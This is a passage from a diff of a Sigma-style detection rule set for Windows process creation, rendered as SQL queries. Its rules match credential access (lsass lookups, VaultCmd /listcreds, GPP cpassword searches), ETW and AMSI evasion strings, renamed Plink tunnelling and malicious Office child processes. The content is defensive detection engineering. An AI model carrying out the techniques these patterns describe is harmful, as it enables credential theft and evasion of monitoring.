ESCAPE '\\') OR (CommandLine LIKE '%tasklist /v /fo csv%' ESCAPE '\\' AND CommandLine LIKE '%findstr /i \"lsass\"%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sc_service_tamper_for_persistence.yml" + "filename": "proc_creation_win_hktl_crackmapexec_patterns.yml" }, { - "title": "ZxShell Malware", - "id": "f0b70adb-0075-43b0-9745-e82a1c608fcc", + "title": "Disable of ETW Trace", + "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", "status": "test", - "description": "Detects a ZxShell start by the called and well-known function name", - "author": "Florian Roth (Nextron Systems), oscd.community, Jonhnathan Ribeiro", + "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", + "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.execution", - "attack.t1059.003", "attack.defense_evasion", - "attack.t1218.011", - "attack.s0412", - "attack.g0001" + "attack.t1070", + "attack.t1562.006", + "car.2016-04-002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND (CommandLine LIKE '%zxFunction%' ESCAPE '\\' OR CommandLine LIKE '%RemoteDiskXXXXX%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE 
'%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_apt_zxshell.yml" + "filename": "proc_creation_win_susp_etw_trace_evasion.yml" }, { - "title": "Windows Credential Manager Access via VaultCmd", - "id": "58f50261-c53b-4c88-bd12-1d71f12eda4c", + "title": "Rundll32 Execution Without DLL File", + "id": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "status": "experimental", - "description": "List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe", - "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1555.004" - ], + "description": "Detects the execution of rundll32 with a command line that doesn't contain a .dll file", + "author": "Tim Shelton, Florian Roth (Nextron Systems), Yassine Oukessou (fix + fp)", "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\VaultCmd.exe' ESCAPE '\\' OR OriginalFileName = 'VAULTCMD.EXE') AND CommandLine LIKE '%/listcreds:%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND NOT ((CommandLine = '') OR (CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine = '') OR (CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe C:\\\\Windows\\\\system32\\\\inetcpl.cpl,ClearMyTracksByProcess%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND CommandLine LIKE '%.cpl%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\syswow64\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName 
LIKE '%:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\MsiExec.exe -Embedding%' ESCAPE '\\') OR (ParentProcessName LIKE '%:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\%' ESCAPE '\\') OR (CommandLine LIKE '% -localserver %' ESCAPE '\\') OR (ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mcmscins.dll\",DllUninstallFunction %' ESCAPE '\\' OR CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\rundll32.exe\" /uninstall /longpath \"C:\\\\Program Files\\\\McAfee\\\\MSC\\\\mscrem.inf%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\EdgeUpdate\\\\Install\\\\{%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\setup.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%\\\\setup.exe\" --install-archive=\"C:\\\\Users\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\' AND CommandLine LIKE '%.tmp%' ESCAPE '\\' AND CommandLine LIKE '%zzzzInvokeManagedCustomActionOutOfProc%' ESCAPE '\\' AND CommandLine LIKE '%Avira.OE.Setup%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_vaultcmd_list_creds.yml" + "filename": "proc_creation_win_rundll32_executable_invalid_extension.yml" }, { - "title": "RDP Port Forwarding Rule Added Via Netsh.EXE", - "id": "782d6f3e-4c5d-4b8c-92a3-1d05fed72e63", - "status": "test", - "description": "Detects the execution of netsh to configure a port forwarding of port 3389 (RDP) rule", - "author": "Florian Roth (Nextron Systems), oscd.community", + "title": "Suspicious Shells Spawn by SQL Server", + "id": "869b9ca7-9ea2-4a5a-8325-e80e62f75445", + "status": "experimental", + "description": "Detects suspicious shell spawn from MSSQL process, this might be sight of RCE or SQL Injection", + "author": "FPT.EagleEye Team, wagga", "tags": [ - 
"attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ], - "falsepositives": [ - "Legitimate administration activity" + "attack.t1505.003", + "attack.t1190", + "attack.initial_access", + "attack.persistence", + "attack.privilege_escalation" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '% i%' ESCAPE '\\' AND CommandLine LIKE '% p%' ESCAPE '\\' AND CommandLine LIKE '%=3389%' ESCAPE '\\' AND CommandLine LIKE '% c%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\sqlservr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Microsoft SQL Server\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%DATEV\\_DBENGINE\\\\MSSQL\\\\Binn\\\\sqlservr.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '\"C:\\\\Windows\\\\system32\\\\cmd.exe\" %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_port_forwarding_3389.yml" + "filename": "proc_creation_win_mssql_susp_child_process.yml" }, { - "title": "Suspicious Microsoft Office Child Process", - "id": "438025f9-5856-4663-83f7-52f878a70a50", - "status": "test", - "description": "Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.)", - "author": "Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye 
Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, SCYTHE @scythe_io", + "title": "Potential AMSI Bypass Using NULL Bits - ProcessCreation", + "id": "92a974db-ab84-457f-9ec0-55db83d7a825", + "status": "experimental", + "description": "Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1047", - "attack.t1204.002", - "attack.t1218.010" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (OriginalFileName IN ('bitsadmin.exe', 'CertOC.exe', 'CertUtil.exe', 'Cmd.Exe', 'CMSTP.EXE', 'cscript.exe', 'curl.exe', 'HH.exe', 'IEExec.exe', 'InstallUtil.exe', 'javaw.exe', 'Microsoft.Workflow.Compiler.exe', 'msdt.exe', 'MSHTA.EXE', 'msiexec.exe', 'Msxsl.exe', 'odbcconf.exe', 'pcalua.exe', 'PowerShell.EXE', 'RegAsm.exe', 'RegSvcs.exe', 'REGSVR32.exe', 'RUNDLL32.exe', 'schtasks.exe', 'ScriptRunner.exe', 'wmic.exe', 'WorkFolders.exe', 'wscript.exe') OR (NewProcessName LIKE '%\\\\AppVLP.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certoc.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ieexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\installutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mftrace.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msidb.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\odbcconf.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pcalua.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regasm.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\verclsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\workfolders.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' 
AND (CommandLine LIKE '%if(0){{{0}}}'' -f $(0 -as [char]) +%' ESCAPE '\\' OR CommandLine LIKE '%#%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_office_susp_child_processes.yml" + "filename": "proc_creation_win_powershell_amsi_null_bits_bypass.yml" }, { - "title": "Schtasks Creation Or Modification With SYSTEM Privileges", - "id": "89ca78fd-b37c-4310-b3d3-81a023f83936", + "title": "Renamed Plink Execution", + "id": "1c12727d-02bf-45ff-a9f3-d49806a3cf43", "status": "experimental", - "description": "Detects the creation or update of a scheduled task to run with \"NT AUTHORITY\\SYSTEM\" privileges", + "description": "Detects the execution of a renamed version of the Plink binary", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1053.005" + "attack.defense_evasion", + "attack.t1036" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '% /change %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\') AND CommandLine LIKE '%/ru %' ESCAPE '\\' AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM %' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%TeamViewer\\_.exe%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/TN TVInstallRestore%' ESCAPE '\\') OR ((CommandLine LIKE '%/Create /F /RU System /SC WEEKLY /TN AviraSystemSpeedupVerify /TR %' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Program Files (x86)\\\\Avira\\\\System Speedup\\\\setup\\\\avira\\_speedup\\_setup.exe%' ESCAPE '\\' OR CommandLine LIKE '%/VERIFY /VERYSILENT /NOSTART /NODOTNET /NORESTART\" /RL HIGHEST%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Plink' OR 
(CommandLine LIKE '% -l forward%' ESCAPE '\\' AND CommandLine LIKE '% -P %' ESCAPE '\\' AND CommandLine LIKE '% -R %' ESCAPE '\\')) AND NOT (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_schtasks_system.yml" + "filename": "proc_creation_win_renamed_plink.yml" }, { - "title": "Windows Shell/Scripting Processes Spawning Suspicious Programs", - "id": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "status": "test", - "description": "Detects suspicious child processes of a Windows shell and scripting processes such as wscript, rundll32, powershell, mshta...etc.", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Query Usage To Exfil Data", + "id": "53ef0cef-fa24-4f25-a34a-6c72dfa2e6e2", + "status": "experimental", + "description": "Detects usage of \"query.exe\" a system binary to exfil information such as \"sessions\" and \"processes\" for later use", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" + "attack.execution" ], "falsepositives": [ - "Administrative scripts", - "Microsoft SCCM" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmiprvse.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')) AND NOT ((CurrentDirectory LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%:\\\\Windows\\\\System32\\\\query.exe' ESCAPE '\\' AND (CommandLine LIKE '%session >%' ESCAPE '\\' OR CommandLine LIKE '%process >%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_query_session_exfil.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "author": "Florian Roth (Nextron Systems)", + "title": "Conhost Spawned By Uncommon Parent Process", + "id": "cbb9e3d1-2386-4e59-912e-62f1484f7a89", + "status": "experimental", + "description": "Detects when the Console Window Host (conhost.exe) process is spawned by an uncommon parent process, which could be indicative of potential code injection activity.", + "author": "Tim Rauch", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName 
LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\conhost.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\services.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\smss.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\userinit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wininit.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\winlogon.exe' ESCAPE '\\')) AND NOT (((ParentCommandLine LIKE '%-k apphost -s AppHostSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k imgsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k localService -p -s RemoteRegistry%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k LocalSystemNetworkRestricted -p -s NgcSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetSvcs -p -s NcaSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s NetSetupSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k netsvcs -p -s wlidsvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k NetworkService -p -s DoSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s AppXSvc%' ESCAPE '\\' OR ParentCommandLine LIKE '%-k wsappx -p -s ClipSVC%' ESCAPE '\\')))) AND NOT (((ParentCommandLine LIKE '%C:\\\\Program Files (x86)\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\' OR ParentCommandLine LIKE '%C:\\\\Program Files\\\\Dropbox\\\\Client\\\\%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_conhost_uncommon_parent.yml" }, { - "title": "Suspicious Recursive Takeown", - "id": "554601fb-9b71-4bcc-abf4-21a611be4fde", + "title": "Ie4uinit Lolbin Use From Invalid Path", + "id": 
"d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", "status": "experimental", - "description": "Adversaries can interact with the DACLs using built-in Windows commands takeown which can grant adversaries higher permissions on specific files and folders", + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1222.001" + "attack.t1218" ], "falsepositives": [ - "Scripts created by developers and admins", - "Administrative activity" + "ViberPC updater calls this binary with the following commandline \"ie4uinit.exe -ClearIconCache\"" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\takeown.exe' ESCAPE '\\' AND CommandLine LIKE '%/f %' ESCAPE '\\' AND CommandLine LIKE '%/r%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ie4uinit.exe' ESCAPE '\\' OR OriginalFileName = 'IE4UINIT.EXE') AND NOT (((CurrentDirectory LIKE 'c:\\\\windows\\\\system32\\\\' ESCAPE '\\' OR CurrentDirectory LIKE 'c:\\\\windows\\\\sysWOW64\\\\' ESCAPE '\\')) OR (CurrentDirectory = '')))" ], - "filename": "proc_creation_win_takeown_recursive_own.yml" + "filename": "proc_creation_win_lolbin_ie4uinit.yml" }, { - "title": "Certificate Exported Via Certutil.EXE", - "id": "3ffd6f51-e6c1-47b7-94b4-c1e61d4117c5", - "status": "test", - "description": "Detects the execution of the certutil with the \"exportPFX\" flag which allows the utility to export certificates.", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community, Nasreddine Bencherchali (Nextron Systems)", + "title": "Remote Access Tool - NetSupport Execution", + "id": "758ff488-18d5-4cbe-8ec4-02b6285a434f", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote 
access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1027" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "There legitimate reasons to export certificates. Investigate the activity to determine if it's benign" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR OriginalFileName = 'CertUtil.exe') AND (CommandLine LIKE '%-exportPFX %' ESCAPE '\\' OR CommandLine LIKE '%/exportPFX %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'NetSupport Client Configurator' OR Product = 'NetSupport Remote Control' OR Company = 'NetSupport Ltd' OR OriginalFileName = 'PCICFGUI.EXE'))" ], - "filename": "proc_creation_win_certutil_export_pfx.yml" + "filename": "proc_creation_win_remote_access_tools_netsupport.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", - "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", + "title": "Suspicious X509Enrollment - Process Creation", + "id": "114de787-4eb2-48cc-abdb-c0b449f93ea4", + "status": "experimental", + "description": "Detect use of X509Enrollment", "author": "frack113", - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], "falsepositives": [ - "Unknown" + "Legitimate administrative script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%X509Enrollment.CBinaryConverter%' ESCAPE '\\' OR CommandLine LIKE '%884e2002-217d-11da-b2a4-000e7bbb2b09%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_powershell_x509enrollment.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Potential NTLM Coercion Via Certutil.EXE", + "id": "6c6d9280-e6d0-4b9d-80ac-254701b64916", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", + "description": "Detects possible NTLM coercion via certutil using the 'syncwithWU' flag", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1218.005" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 
